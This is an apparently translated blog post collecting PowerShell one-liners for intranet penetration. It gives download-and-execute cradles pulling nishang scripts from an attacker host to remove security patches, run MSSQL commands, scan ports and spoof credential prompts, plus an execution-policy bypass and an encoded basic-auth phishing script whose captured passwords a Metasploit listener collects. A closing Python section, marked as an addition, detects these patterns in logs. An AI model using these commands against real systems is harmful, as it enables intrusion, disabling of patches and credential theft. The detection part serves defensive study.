Some PowerShell scripts used in intranet penetration (Part 1)


Downloading a file with PowerShell:

powershell (new-object System.Net.WebClient).DownloadFile('http://down.360safe.com/360/inst.exe','d:\test\360.exe')


By default, PowerShell does not allow a .ps1 script to be run directly, but the following command bypasses the execution policy and runs a .ps1 script directly:

PowerShell.exe -ExecutionPolicy Bypass -File .\runme.ps1


PowerShell webshell (ASPX shell):

https://github.com/samratashok/nishang/tree/master/Antak-WebShell


Removing patches

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Escalation/Remove-Update.ps1'); Remove-Update All"       //remove all patches


powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Escalation/Remove-Update.ps1'); Remove-Update KB2761226"       //remove a specified patch


powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Escalation/Remove-Update.ps1'); Remove-Update Security"       //remove security updates


Executing MSSQL commands:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Execution/Execute-Command-MSSQL.ps1');  Execute-Command-MSSQL -ComputerName sqlserv01 -UserName sa -Password sa1234"


Checking whether the host is a virtual machine:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Check-VM.ps1'); Check-VM"


Invoke-CredentialsPhish:

Tricks the user into providing credentials in plain text. (It spoofs a login prompt asking for the account name and password; a wrong password just re-prompts, and the dialog cannot be closed.)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/Invoke-CredentialsPhish.ps1'); Invoke-CredentialsPhish"



Scanning intranet IPs and ports

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.4.4/nishang/nishang-master/Gather/FireBuster.ps1'); FireBuster 192.168.4.1 1000-1020 -Verbose"


PowerShell basic-authentication phishing and capture

Script:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $wc = new-object net.webclient; $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)"); $wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, ''); $result = $wc.downloadstring('https://192.168.1.1');//listener IP

Convert it to base64 (the script is saved as power.txt):

cat power.txt | iconv --to-code UTF-16LE | base64

Run the encoded script:

powershell -ep bypass -enc <the base64 output above>
Using msf

auxiliary/server/capture/http_basic

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[+] 192.168.1.102 - Credential collected: "SITTINGDUCKuser:admin888" => /

That is enough to capture the password.
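From the defender's side, every one-liner on this page leaves the same fingerprints in process-creation and script-block logging: an IEX/DownloadString cradle, an execution-policy bypass, an -enc payload, a nishang function name, or a credential prompt. The following is an added example (not part of the original post) that runs such rules over constructed sample command lines; the rule names, the SAMPLE_EVENTS list and the classify/scan helpers are assumptions made for this example.

```python
import base64
import re

# Constructed sample command lines (stand-ins for the CommandLine field of
# Sysmon event 1 / Security 4688, or ScriptBlockText of event 4104); not real telemetry.
_ENC_PAYLOAD = "$cred = $host.ui.PromptForCredential('Failed Authentication','','','')"
SAMPLE_EVENTS = [
    "powershell \"IEX (New-Object Net.WebClient).DownloadString("
    "'http://192.168.4.4/nishang/nishang-master/Gather/Check-VM.ps1'); Check-VM\"",
    "powershell -ep bypass -enc "
    + base64.b64encode(_ENC_PAYLOAD.encode("utf-16-le")).decode("ascii"),
    r"powershell (new-object System.Net.WebClient).DownloadFile("
    r"'http://down.360safe.com/360/inst.exe','d:\test\360.exe')",
    'powershell -NoProfile -Command "Get-Service -Name wuauserv"',  # benign admin use
]

# Detection rules derived from the one-liners shown on this page.
RULES = {
    "download_cradle": re.compile(
        r"(IEX|Invoke-Expression).{0,80}DownloadString|\.DownloadFile\(", re.I),
    "policy_bypass": re.compile(r"-(ExecutionPolicy|ep)\s+Bypass", re.I),
    "encoded_command": re.compile(r"-(enc|EncodedCommand)\s+([A-Za-z0-9+/=]+)", re.I),
    "nishang_module": re.compile(
        r"Remove-Update|Execute-Command-MSSQL|Check-VM|Invoke-CredentialsPhish|FireBuster", re.I),
    "credential_prompt": re.compile(r"PromptForCredential", re.I),
}

def decode_encoded_command(cmdline):
    """Decode the base64 UTF-16LE argument of -enc/-EncodedCommand, else return None."""
    m = RULES["encoded_command"].search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(cmdline):
    """Sorted names of the rules matching a line. An -enc payload is decoded and
    matched as well, so encoding alone does not hide a cradle or a credential prompt."""
    hits = {name for name, rx in RULES.items() if rx.search(cmdline)}
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits |= {name for name, rx in RULES.items() if rx.search(decoded)}
    return sorted(hits)

def scan(events=SAMPLE_EVENTS):
    """Map each event with at least one hit to the list of rules it triggered."""
    return {e: classify(e) for e in events if classify(e)}

if __name__ == "__main__":
    for event, hits in scan().items():
        print(", ".join(hits), "<-", event[:70])
```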

This article was first published on the WeChat public account 关注安全技术: Some PowerShell scripts used in intranet penetration (Part 1)
